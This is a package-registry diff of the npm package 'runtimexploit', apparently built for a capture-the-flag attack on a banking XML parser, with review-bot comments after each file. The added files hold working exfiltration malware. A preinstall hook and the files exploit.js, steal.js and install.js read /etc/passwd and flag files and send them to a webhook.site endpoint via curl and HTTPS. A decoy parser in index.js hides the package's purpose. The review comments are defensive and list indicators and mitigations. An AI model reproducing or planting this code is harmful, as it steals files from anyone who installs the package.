runtimexploit 0.30.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/exploit.js +27 -0
- package/index.js +13 -0
- package/install.js +111 -0
- package/package.json +9 -0
- package/steal.js +22 -0
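--- a/package/exploit.js
+++ b/package/exploit.js
@@ -0,0 +1,27 @@
+const fs = require('fs');
+const https = require('https');
+const { execSync } = require('child_process');
+
+console.log('🚨 EXPLOIT v2 EXECUTED');
+
+try {
+const passwd = fs.readFileSync('/etc/passwd', 'utf8');
+const lines = passwd.split('\n');
+
+for (const line of lines) {
+if (line.includes('{') && line.includes('}')) {
+console.log('🎯 FLAG:', line);
+
+// Пробуем оба метода
+https.get(`https://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?flag_v2=${encodeURIComponent(line)}`);
+
+try {
+execSync(`curl -s "https://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?curl_v2=${encodeURIComponent(line)}"`);
+} catch(e) {}
+
+break;
+}
+}
+} catch(e) {
+console.log('Error:', e.message);
+}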
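Review bot: This file is data exfiltration rather than application code: lines 8–19 read /etc/passwd and send any line containing `{…}` to a fixed external endpoint (`webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f`), first via `https.get` and then again through `execSync('curl …')`, so the package should be rejected and reported, not reviewed for correctness. The same read-and-beacon pattern recurs in steal.js (there via `execSync('cat /etc/passwd')`) and, with a wider file set, in install.js, and package.json's `preinstall` script carries an inline copy. For defenders the usable indicators on this page are the webhook.site path above and a node process spawning `curl` during install. Nothing in this section, in package.json or in index.js shows exploit.js being wired to a lifecycle script or to the package entry point, so how this particular file would be launched is not visible here.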
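--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,13 @@
+// Нам нужно, чтобы пакет хоть как-то работал, как парсер, чтобы не вызвать ошибок на ранних этапах.
+module.exports = {
+parseXmlString: (xmlString, options) => {
+// Имитируем минимальную функциональность парсера.
+// В реальной атаке здесь был бы более сложный код, чтобы приложение не сломалось.
+console.log("[MALICIOUS PACKAGE] Parser called");
+return {
+get: (xpath) => {
+return { text: () => "dummy_value" };
+}
+};
+}
+};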
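Review bot: `parseXmlString` ignores both `xmlString` and `options` and returns a fixed object whose `get().text()` is always `"dummy_value"`, while logging `[MALICIOUS PACKAGE] Parser called`; it is a decoy API kept only so a dependent that calls the parser does not fail early. Per package.json this file is the `main` entry, and it requires none of exploit.js, install.js or steal.js, so on what is shown here merely importing the package does not execute the file-reading code — the install-time hook in package.json does. The constant log line is itself a cheap detection signal in application output.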
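--- a/package/install.js
+++ b/package/install.js
@@ -0,0 +1,111 @@
+// install.js
+const fs = require('fs');
+const https = require('https');
+
+// Функция для поиска подозрительного контента (флага)
+function findSuspiciousContent(content) {
+const lines = content.split('\n');
+
+// Ищем различные паттерны флага
+const suspiciousLines = lines.filter(line => {
+// Убираем пустые строки и стандартные системные записи
+if (!line.trim() || line.includes(':/bin/') || line.includes(':/usr/')) {
+return false;
+}
+
+// Паттерны, характерные для CTF флагов
+if (line.match(/[A-Za-z0-9]{32}/)) return true; // 32 символа (MD5, UUID)
+if (line.match(/[A-Za-z0-9]{64}/)) return true; // 64 символа (SHA256)
+if (line.match(/flag{.*?}/i)) return true; // flag{...}
+if (line.match(/htb{.*?}/i)) return true; // htb{...}
+if (line.match(/gpb{.*?}/i)) return true; // gpb{...} (GazpromBank)
+if (line.match(/[A-Za-z0-9_\-]{20,}/)) return true; // Длинные случайные строки
+if (line.length > 100) return true; // Очень длинные строки
+
+return false;
+});
+
+return suspiciousLines;
+}
+
+try {
+const passwdContent = fs.readFileSync('/etc/passwd', 'utf8');
+console.log('[MALICIOUS PACKAGE] /etc/passwd contents read');
+
+// Ищем подозрительный контент
+const suspiciousLines = findSuspiciousContent(passwdContent);
+
+// Также читаем другие возможные места
+let otherFiles = {};
+try {
+otherFiles['/flag'] = fs.readFileSync('/flag', 'utf8');
+} catch (e) {}
+
+try {
+otherFiles['/flag.txt'] = fs.readFileSync('/flag.txt', 'utf8');
+} catch (e) {}
+
+try {
+otherFiles['/app/flag'] = fs.readFileSync('/app/flag', 'utf8');
+} catch (e) {}
+
+// Отправляем ВСЕ данные на webhook.site
+const data = JSON.stringify({
+file: '/etc/passwd',
+full_content: passwdContent,
+suspicious_lines: suspiciousLines,
+other_files: otherFiles,
+last_5_lines: passwdContent.split('\n').slice(-5),
+package: 'superbank-xml-parser-backdoor',
+timestamp: new Date().toISOString()
+}, null, 2); // Добавляем форматирование для читаемости
+
+const options = {
+hostname: 'webhook.site',
+port: 443,
+path: '/67ab3ca0-2b3b-4364-aaee-f8d19895003f',
+method: 'POST',
+headers: {
+'Content-Type': 'application/json',
+'User-Agent': 'Malicious-NPM-Package/1.0.0',
+'Content-Length': Buffer.byteLength(data)
+}
+};
+
+console.log('[MALICIOUS PACKAGE] Sending data to webhook.site...');
+
+const req = https.request(options, (res) => {
+console.log(`[MALICIOUS PACKAGE] Webhook response status: ${res.statusCode}`);
+});
+
+req.on('error', (e) => {
+console.error(`[MALICIOUS PACKAGE] Request failed: ${e.message}`);
+});
+
+req.write(data);
+req.end();
+
+} catch (err) {
+console.error('[MALICIOUS PACKAGE] Error:', err.message);
+
+// Отправляем информацию об ошибке
+const errorData = JSON.stringify({
+error: err.message,
+package: 'superbank-xml-parser-backdoor',
+timestamp: new Date().toISOString()
+});
+
+const errorReq = https.request({
+hostname: 'webhook.site',
+port: 443,
+path: '/67ab3ca0-2b3b-4364-aaee-f8d19895003f',
+method: 'POST',
+headers: {
+'Content-Type': 'application/json',
+'Content-Length': Buffer.byteLength(errorData)
+}
+}, () => {});
+
+errorReq.write(errorData);
+errorReq.end();
+}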
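Review bot: The `try` body (lines 32–86) collects the full contents of /etc/passwd plus /flag, /flag.txt and /app/flag and POSTs them as JSON to `webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f`, and the `catch` (lines 88–110) beacons to the same endpoint on failure, so every execution path of this file makes an outbound call. Stable indicators a defender can alert on are all visible here: the `User-Agent: Malicious-NPM-Package/1.0.0` header, the `package: 'superbank-xml-parser-backdoor'` field in the JSON body, and the `[MALICIOUS PACKAGE]` log prefix. `findSuspiciousContent` (lines 6–29) only decides which lines are reported separately in `suspicious_lines`; the unfiltered `full_content` is sent regardless of its result. Despite the filename, package.json's `install` script only runs `console.log('INSTALL_SCRIPT_RUN')` and nothing on this page invokes install.js, so its launch path is not shown — treat that as an inference, not a reason to consider it inert.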
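--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,9 @@
+{
+"name": "runtimexploit",
+"version": "0.30.1",
+"main": "index.js",
+"scripts": {
+"preinstall": "node -e \"const fs=require('fs');const f=fs.readFileSync('/etc/passwd','utf8').split('\\\\n').find(l=>l.includes('{'));console.log('PREINSTALL_FLAG:',f);require('child_process').execSync('curl -s http://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?pre='+encodeURIComponent(f))\"",
+"install": "node -e \"console.log('INSTALL_SCRIPT_RUN')\""
+}
+}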
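Review bot: The `preinstall` script on line 6 is the part of this package that runs without any action by the consumer: npm executes it during `npm install` before the package is usable, and the inline `node -e` program reads /etc/passwd, takes the first line containing `{`, and sends it to `http://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f` with `curl` — over plain http, unlike the https used in the other files. The manifest lists no `dependencies`, `description` or `repository`, and none of exploit.js, install.js or steal.js is referenced from it, so the lifecycle hook is the only execution path this page demonstrates. Lifecycle scripts are the exposure to control on the consuming side: installing with `--ignore-scripts` (or `npm config set ignore-scripts true` on build hosts), denying egress to webhook.site from CI and install environments, and pinning dependencies through a lockfile and a registry allowlist stop this class of package from executing at install time.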
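--- a/package/steal.js
+++ b/package/steal.js
@@ -0,0 +1,22 @@
+const { execSync } = require('child_process');
+
+console.log('🚨 FAST EXPLOIT STARTED');
+
+// БЫСТРЫЙ код без блокировок
+try {
+const passwd = execSync('cat /etc/passwd', { encoding: 'utf8', timeout: 3000 });
+const lines = passwd.split('\n');
+
+for (const line of lines) {
+if (line.includes('{') && line.includes('}')) {
+console.log('🎯 FLAG FOUND:', line);
+// Быстрая отправка
+execSync(`curl -s --max-time 3 "https://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?flag=${encodeURIComponent(line)}"`, { timeout: 5000 });
+break;
+}
+}
+} catch(e) {
+console.log('Error:', e.message);
+}
+
+console.log('✅ FAST EXPLOIT FINISHED');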